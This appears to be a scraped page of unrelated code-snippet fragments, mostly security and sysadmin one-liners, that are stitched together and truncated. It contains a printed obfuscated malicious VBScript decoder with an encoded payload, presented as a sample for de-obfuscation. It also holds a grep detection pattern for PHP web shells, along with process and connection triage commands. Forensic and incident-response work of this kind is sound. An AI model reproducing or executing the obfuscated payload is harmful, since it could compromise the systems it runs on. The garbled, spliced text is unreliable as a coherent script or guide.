<#
.SYNOPSIS
sqlite.ps1 - Install, run, and uninstall sqlite for all your hacky needs.
.OUTPUTS
Should be no outputs other than what is generated in the sqlite session.
.EXAMPLE
.\sqlite.ps1 - _Runs the script_
.NOTES
Underscores denote sarcasm
#>

De-obfuscation 23/07/2020

The raw script malicious.vbs

Private Function BysqAEwmfD(zEx) : If Len(zEx) < 5 Then : a = "" : Exit Function : End If : Dim p : zEx = Mid(zEx,3,Len(zEx)-4) : For i=2 To Len(zEx) Step 2 : xehFDCC = Asc(Mid(zEx,i,1)) + 10 : If xehFDCC > 126 Then : xehFDCC = xehFDCC - 126 + 33 - 1 : End If : j=Chr(xehFDCC) : If j = "~" Then : j=" " : End If : p = p & j : Next : BysqAEwmfD = p : End Function : BnjBhzaGjEs = BysqAEwmfD("}H6Iv[7j~tci.[phYlt_nY9[/t*3rtH91hl[]W^j|[3EDXw`{[&YWj:|CvjInYN^([hZkk,bm[w$QI\[NhTlv_rYr[HvO}gtL0&tNY:W`bDb~t]i.[KhUlj_JY^[y$!9yevd*d|[{YBjN|u}/t+0Tt#:,_DcMt=jBWhi:a?:B[q\z_Vd~_(j+_oe3det_0ytmI>[rjatgj0WVi'aE:5[i\`_3d+_@jM_]eTd#tb3=tkik[(h=lX_:Y=[v$1DS[bmKJ]W,i3aJ|Q&>}Rt|tS0[tcjDWliXa_:)[(\j_=dl_Aj&_Yeqd\$'H+[r]/_(iaj^hUWujE_>eTd6?cd`\de,$"":x[YikY=hN_#fWj%_,e^d9tR3HtrvSj0WAilan:>[2ibY6v0t^0Itqj~W=iHa>:S[/\^_Ldi_Zj#_KepdU$uIz[:jkj{_cdC]\i=$=;}dpWdX-bK[fZ>te3ktZJ>h5k.[?t-0.tOj8WfiGaY:D[5\]_7df_UjZ_[e!dk$%I*[Gj<j__.dr]BiD$RIEj#WshijdM1^A[rd17olPW4_rbiW
<#
.SYNOPSIS
Pull the following from the DC:
# Local Time
# Desktop settings
# BIOS info
# Installed hotfixes
# Operating System Version Information
# Local Users and owner
# All services on local machine
#!/usr/bin/python
# Lets get those evil IPS!
# If you’re using Linux or BSD systems, check your favourite package repository for python-celementtree or py-celementtree packages
#
# Aggregation of bad IPs is what this is after, and that's what I'll make it do
#
import xml.etree.cElementTree as ET
import numpy as np
import sys
<#
.SYNOPSIS
Uninstall HP Data Protector if it exists
.INPUTS
Path for:
# HP Data Protector
.OUTPUTS
Console output - Currently
.NOTES
Version: 1.0
#!/bin/sh
say -v Karen "theee"
say -v Daniel "eeeeee"
say -v Alex "eeeeee"
say -v Tessa "eeeeee"
## Using Test-Connection, test connectivity to the internet using the following as subjects: ##
## 8.8.8.8
## http://google.com
## https://google.com
## Find and replace XXXX with your choice of internal DNS name :)
##
function UX-Pause {
Write-Progress -Activity "Testing Connection" -SecondsRemaining 3
Start-Sleep 1
# List file capabilities for every entry in the current directory (globbing instead of parsing ls, so names with spaces survive)
for filename in ./*; do getcap "$filename"; done
# Look for potentially bad stuff that's compressed to hide mysterious things - run this within documentroot's of web servers to find potential php shells (source: https://djlab.com/2010/09/finding-php-shell-scripts-and-php-exploits/)
grep '((eval.*(base64_decode|gzinflate|\$_))|\$[0O]{4,}|FilesMan|JGF1dGhfc|IIIl|die\(PHP_OS|posix_getpwuid|Array\(base64_decode|document\.write\("\\u00|sh(3(ll|11)))' . -lroE --include=*.php*
# Print out processes in a nicer format to compare its shown source to actual source
ps -Ao pid,comm,cmd,lstart
# Deny those damn pesky processes their CPU time - this is based on all the bad processes being under a single user. Don't run this unless you're sure that
pkill -U <user> -STOP || pkill -STOP -U <user> # Depending on OS
# Deny processes CPU time - this is based on a process by process working order
CrazyLlama / gist:e9c5a931c9b37fc2cf40d184e23a7c94
Created November 16, 2017 10:12
Example one-liners, powershell edition
## Sources:
# https://www.dionach.com/blog/powershell-in-forensic-investigations
# https://www.sans.org/reading-room/whitepapers/critical/uncovering-indicators-compromise-ioc-powershell-event-logs-traditional-monitoring-tool-36352
# https://blogs.technet.microsoft.com/heyscriptingguy/2012/05/28/use-powershell-to-aid-in-security-forensics/
# Lists out all established TCP connections, you can also use netstat to list all connections regardless of status. Make sure you decide whether this is TCP or UDP you want to see and remove the parentheses
Get-NetTCPConnection -State Established
netstat -ano -p (TCP/UDP)
# List out all processes running on the server